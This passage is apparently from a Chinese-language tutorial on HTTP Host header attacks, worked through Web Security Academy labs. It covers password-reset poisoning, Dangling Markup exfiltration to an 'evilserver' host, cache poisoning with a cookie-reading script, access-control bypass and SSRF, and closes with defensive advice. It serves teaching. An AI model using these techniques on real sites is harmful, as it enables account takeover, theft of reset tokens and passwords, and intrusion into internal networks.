这里就输入受害用户carlos进行重置密码,然后抓包将Host头的值改为我们自己的服务器:
ec1f439fbc6013f1b4f71011a2885947.png
然后在我们自己的服务器上就可以通过访问日志看到被窃取的重置密码Token:
c3b81283ee2a440dcf205a1ab344ab32.png
然后根据已知链接规律,构造重置密码的链接:
https://ac651f551e5317b8800207bd008f000f.web-security-academy.net/forgot-password?temp-forgot-password-token=00YIexUDyNLEJkaBXDoCILWtZAGaxgi7
1a4ba4a58416c68b3f513ba1239f76d9.png
随即进入输入新密码的界面,密码重置中毒成功。
5.1.2 密码重置中毒—注入覆盖Host头的字段
有时候直接修改Host头、添加重复Host头的值以及混淆Host头都不行:
3ca0c53bfef0d9b47a9f788eb484f40f.png
可以尝试使用与Host头功能相同的HTTP字段,如X-Forwarded-Host、X-Forwarded-For等,可以进行Fuzz:
cbb645bac4d5b28e8b91c39b174a0767.png
实际上他能够被 X-Forwarded-Host 字段影响,导致Host头攻击,当同时添加多个字段使请求被拦截时,可以尝试类似排除法、二分法来排查哪个字段有效。
对受害用户carlos进行密码重置投毒:
53fd95a8a051dd84951094b4e3e79502.png
然后构造链接即可:
https://acf11f4e1f164378800b165b00bb007d.web-security-academy.net/forgot-password?temp-forgot-password-token=o8gD3Le1K0YQcb2AaASgiI8F2eVI5m3h
efb5ab58ec4a711faa6f4dac736e069a.png
5.1.3 重置密码中毒—Dangling Markup技术
首先简单介绍一下 Dangling Markup技术:
Dangling markup技术
Dangling markup技术, 是一种无需脚本即可窃取页面内容的技术,它使用图像等资源(结合CSP运行的策略)将数据发送到攻击者控制的远程位置。当反射型XSS不工作或被内容安全策略(CSP)阻止时,它非常有用。其思想是插入一些未完成状态的部分HTML,例如图像标记的src属性,页面上的其余标记关闭该属性,但同时将两者之间的数据(包含窃取页面的内容)发送到远程服务器。
例如,我们在反射型XSS注入点上注入这样一个img标签:
<img src="https://evilserver/?
则注入点和下一个双引号的代码将会发送到攻击者的 https://evilserver 服务器, 其中被发送的代码或者内容可能包含一些敏感信息, 例如CSRF Token等, 配合反射型XSS以完成CSRF的利用。
关于 Dangling Markup技术 的实战意义可以参考博主之前的文章:绕过CSP之Dangling markup技术
什么时候可以使用 Dangling Markup技术 呢?与我们这篇文章的主题有什么关系呢?
我们直接进入主题,当输入需要重置密码的用户名后,该用户的邮箱内会收到如下邮箱:
67a4c2bc755ebbb44847d23189d30422.png
有一个跳转到登录界面的链接,后面紧接着重置之后的随机密码。
此时考虑一下,该链接是否是从Host头取值而来?只要这个值可控,那么就可以利用Host头攻击实施 Dangling Markup攻击,包含住链接后面紧跟着的密码,再结合Host头攻击将请求指定到攻击者服务器上。一个漫天过海的窃取行为就完成了。
第一步,寻找Host头攻击点:
通过Fuzz,可发现Host头攻击类型为 忽略端口仅校验域名。即服务端在校验Host域的时候,仅校验了域名,忽略了后面的端口号,造成端口值可控(可以是数字或字符):
904608f5a5bb3404d1ef62f6c92481b9.png a59bf77cc52ad88158c7fdc06202e54b.png
通过在Host头的端口中注入payload,依旧可以实现Host头攻击。
第二步,借助可控变量 Host:ip:port 来实施 Dangling Markup技术,从而将后面的密码外带到攻击者服务器上:
注意,需要闭合此处的双引号出去,经过尝试,输入单引号时,服务端会自动转为双引号,故这里通过单引号将双引号闭合,然后添加自定的<a href=xxx.attack-domain>标签将密码外带:
184e31cb9b0426e30db33340e2e16c91.png
原本的正常HTML是这样的:
ed4e92688d41cd5e90434d73f12aa811.png
通过Dangling Markup技术 在a标签的链接中注入? 符,使得后面的值在双引号闭合之前全部被当做URL参数请求到攻击者服务器上:
b90e561f45ba0a4e1df4f0363069921e.png
这也是 Dangling Markup技术 的精髓所在,该技术的核心点在于:
可控变量后面是否接着需要窃取的关键数据(包括Token、密码等)
在攻击者服务器上可以看到被Host头攻击转发上来的请求,里面成功窃取了受害者重置后的密码:
d1f9d32d9c0a753a3088e81d382ce9e6.png
5.2 Host头攻击+缓存投毒
当存在Host头攻击的web站点不存在密码重置的功能的时候,此时该漏洞就显得没有影响,因为不可能驱使用户去抓包修改Host头,辅助攻击者完成一系列的攻击。
但是,如果目标站点使用Web缓存,则可以通过缓存投毒给其他用户提供带有病毒的缓存响应。此时的Host头攻击漏洞转变为类似XSS存储型类的漏洞。要构造Web缓存投毒攻击:
1. 需要寻找映射到其他用户请求的缓存键;
2. 下一步则是缓存此恶意响应;
3. 然后,此恶意缓存将提供给尝试访问受影响页面的所有用户。
第一步,寻找Host头攻击点:
通过对站点的主页添加重复的Host值,可以达到覆盖的效果,并验证存在Host头攻击:
b09b4eeacd00d364633ccda68d1de500.png
第二步,寻找是否使用了Web缓存?缓存键是什么?
从上图中也可以发现,站点使用了Wen缓存功能,并且配合Host头攻击,可以缓存/resources/js/tracking.js资源文件。
第三步,在攻击者服务器上创建一个同名的 /resources/js/tracking.js资源文件,内容为:
alert(document.cookie)
然后通过Host头注入攻击者服务器域名,可以看到在响应中正确地对应了我们的 /resources/js/tracking.js资源文件:
8458208389ca34f2736aea5e82afc11e.png
发送多次请求,使该请求的响应变为缓存:
200f4558b179f6aa8cd8bda18f763b66.png
当其他用户请求站点主页时,服务端就会提供该恶意缓存给用户,造成缓存投毒。
5.3 Host头攻击绕过访问控制
出于安全考虑,通常网站对某些功能的访问限制为内部用户使用。但是通过Host头攻击一定可能上可以绕过这些限制。
对于一个站点,从发现Host头攻击到利用,下面来展示一个完整的流程:
第一步,访问主页,随意修改Host的值:
9649967593356ece9722484a91980ff3.png
注意,这里的Host的值不会出现响应包中,但是依然可能存在Host头攻击,因为响应依然成功,说明服务端没有对Host头做验证。
第二步,寻找敏感页面,通过 /robots.txt 知道 /admin 为做了访问控制的页面:
d3fd91199b6c914ec44a0b7659f56e1d.png
可以错误信息提示,/admin 页面只允许本地用户访问。
第三步,将Host改为服务端内部地址,从而绕过IP访问控制:
c66736849f5149d01997ea9edbf9f1ce.png
5.4 Host头攻击+SSRF
Host头攻击可能会导致基于路由的SSRF攻击,称为:Host SSRF Attack。
经典的SSRF攻击通常基于XXE或可利用的业务逻辑,将用户可控的URL作为HTTP请求发送;而基于路由的SSRF依赖于云部署的体系结构中,包括负载均衡和反向代理,这些中间件将请求分配发送到对应的后端服务器处理,如果服务端未校验Host头转发的请求,则攻击者可能会将请求发送(重定向)到体系中的任意系统。
这可能需要知道内部系统的IP地址(私有地址),一般可以通过信息收集或者Fuzz来判断有效的私有IP地址(如枚举192.168.1.1/16)。
5.4.1 基础Host头攻击+SSRF
比如,普通方式访问不到 /admin 页面(404):
774952d6bc5c1f9c84078f832d213f06.png
猜测 /admin 存在于内网中,需要内网机器才能访问,但是配合Host头攻击+SSRF可以绕过并访问。
第一步,判断Host是否被使用,可用DNSLog外带
这里我使用Burp自带的 “Burp Collaborator client” 来实现外带:
fe89ddd297619cc7283a92ba551a877e.png
说明服务端是根据Host头的域名来请求资源的。
第二步,基于Host头的SSRF探测内网主机
假如一些敏感的页面(比如管理页面),深处于内网,外网无法访问,但是通过Host头攻击+SSRF可达到绕过访问控制,从而访问内网资产,这里Fuzz内网的IP的C段为192.168.0.0/24,直接利用Intruder枚举:
a450a6e1f580ed2201f1e7a20d8c7395.png 8f19202c9c4fc0a81696f084f2066d1d.png
得到内网IP为192.168.0.240
第三步,访问内网资源
构造 /admin 页面,在Host处换位内网IP:
4522a7e735f469b8221d677c8b6a1966.png
5.4.2 Host头攻击+SSRF—使用绝对路径的URL
有时候服务端会校验Host头的值,如果Host被修改,服务端会拒绝一切修改过后的请求:
591a625e712178e117db63b2d5e217fc.png
普通请求通常在请求域上使用相对路径,但是,服务端也同时可能配置了绝对URL的请求,采用如下形式可绕过对Host的验证:
GET http://acab1f4b1f3c7628805c2515009a00c9.web-security-academy.net/ HTTP/1.1
4030f968be73cbd6bf90f8e61dde4d2a.png
接着用 “Burp Collaborator client” 进行外带:
6b68718a8514a4b9803f40b8d227d959.png
外带成功,说明Host头被服务端使用来向指定域名请求资源,直接SSRF爆破内网:
675515a890884884ce25786619575ca2.png
访问内网页面:
4e7c3841b5c7ee2aaa0e6f3bf75e4bad.png
6 HTTP Host头攻击防护
最简单的方法是避免在服务器端代码中完全使用Host头,可以只使用相对URL。
其他方法包括:
6.1 正确配置绝对域名URL
当必须使用绝对域名URL时,应在配置文件中手动指定当前域的URL,并引用配置的值,而不是从HTTP的Host头中获取。这种方法可防止密码重置的缓存投毒。
6.2 白名单校验Host头的域
如果必须使用Host头,需要正确校验它的合法性。这包括允许的域,并使用白名单校验它,以及拒绝或重定向对无法识别的主机请求。这包括但不仅限于单个web应用程序、负载均衡以及反向代理设备上。
6.3 不支持主机头覆盖
确保不适用与Host头功能相近的字段,如X-Forwarded-Host、X-Forwarded-For等,这些有时候是默认开启的。
值得一提的是,不应该将内网使用的Host主机(不出网)与公网的应用程序托管在同一个服务器上,否则攻击者可能会操纵Host头来访问内部域。
